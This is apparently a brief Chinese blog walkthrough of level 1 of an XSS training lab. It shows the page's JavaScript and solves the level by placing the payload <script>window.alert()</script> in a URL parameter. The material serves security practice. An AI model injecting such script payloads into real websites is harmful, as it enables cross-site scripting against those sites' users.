XXS level1

level1

XXS level1

(1)查看PHP源码,发现可以通过调用window,alert()完成任务

window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level2.php?keyword=test"; 
}

(2)可在url后面的参数内输入脚本,回车

name=<script>window.alert()</script>

 XXS level1

点击“确定即可到第二关

 

上一篇:PMP Level1 引论


下一篇:机器学习之pandas 索引笔记